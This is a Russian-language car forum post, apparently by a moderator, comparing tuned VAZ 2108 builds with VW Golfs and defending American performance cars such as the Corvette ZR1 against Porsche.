Показано с 1 по 10 из 128

Тема: суши или пиво с сосиками ?

Древовидный режим

Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Машина
    Skoda
    Цитата Сообщение от VVZ Посмотреть сообщение
    Ну так я приводил аналогию. Берешь ВАЗ 2108 и делаешь из него корч. Поверь, в большую сумму денег это точно не выльется. И конечно же этот корч оставит далекооо позади ГТИ. Но согласись, что это не дает повода называть Гольф говном.

Спасибо за совет ))) У меня был ВАЗ08 мотор гр.А, супер1600 на двух гоночных 45-х. с КПП мало похожей на сток. С бюджетом только одного мотора ок. 8-9К$. Да она действительно объезжала с места чипованный Мк4 1.8Т. Да я немного её даже побаивался по молодости, жаль что мало владел, но строил все под себя 4 года постоянно в эволюции.... ребята которые у меня её забрали, стали приезжать на подиуме в любительских грунтовых ралли..... вспоминаю с любовью. Ну насчет недорого, это конечно ты погорячился, ибо делать из неё решения как у спортсменов, не дешевле чем тебе на Мк5 делая из него 500 сил. Все это проходили.
    Есть ценниг и детали "типа тюнинг" из Кунцево, а есть решения из Тольятти и их подразделения спортивных технологий положивших начало Кубка Лады и сумашедших супер1600 16V на дросселях за 200 л.с. при 9500 об. (а-ля раша ВТЕК Хонда).
    Конечно понятие корч мне тогда не симпатизировало, поэтому там было 200 кг. лишнего веса, да и не атмо это было, но в то время турбо у кого было, больше 10-20 тыщ. км в динамичном режиме не жило. Сейчас уже конечно попроще, ну и то если представить, для меня Мк1 или Мк2 с АБФ 2.0 турбо, будет приятней и не дороже хорошего корча турбо ТАЗ )))

Они даже по прямой нормально ехать не могут ))))

Конечно это шутка, но реально я хотел бы увидеть подтверждений того, что на треке какие-то "американские гоночные диваны" (конечно же в стоке, или имеется ввиду какая-то серия?) объезжают Порше.
    насчет стока, тут нельзя всех под одну гребенку. Я у же как то писал, что в Америке маркетинг на первом месте. Т.е. машины для определенных целей: грузовички-серийные автошки для всех-минивэны-масклкары. Причем среди всех категорий можно встретить обязательно заряженную версию. Если сравнивать, сток из штатов и из европы, то для Порше лучше всего подойдут из последний категории, а именно как мне кажется типа Корвета, или Вайпера. У Форда например ехать по треку в стоке Мустанг не способен, но если поставить на него например винты (даже у КВ должны быть), то можно и его. Насчет езды гоночного дивана против Порше, мой ответ ниже )

А вообще спорить с такими заявлениями - бессмысленно.
    Насчет Корветта наверное ты так пошутил ))))
    Время серийного Корвета ZR1 2012, на серийной резине в Нурбургринге 7:19.63. Время остальных машин за все годы можно найти в инете. Как то после этого не получается сказать об этой машине плохого.
    Да и почему всем кто видел только на картинках эти авто, все время кажется, что они не едут ?........странно. Это предрассудки ИМХО.

А вообще, если про гоночный, то например для меня в одну линейку честных, как бы это сказать настоящих дримкаров, помимо Ауди S1, старых Порше, я с удовольствием поставил бы и этот:
    Это как раз ответ на вопрос, что могут американцы, знающие что такое гонки уже 200 лет, если они подготовят свой авто:

начало гонки с 2:40

сказка ))
    Последний раз редактировалось BON; 08.04.2012 в 16:29.
    песок сыпется....не останавливайтесь на достигнутом !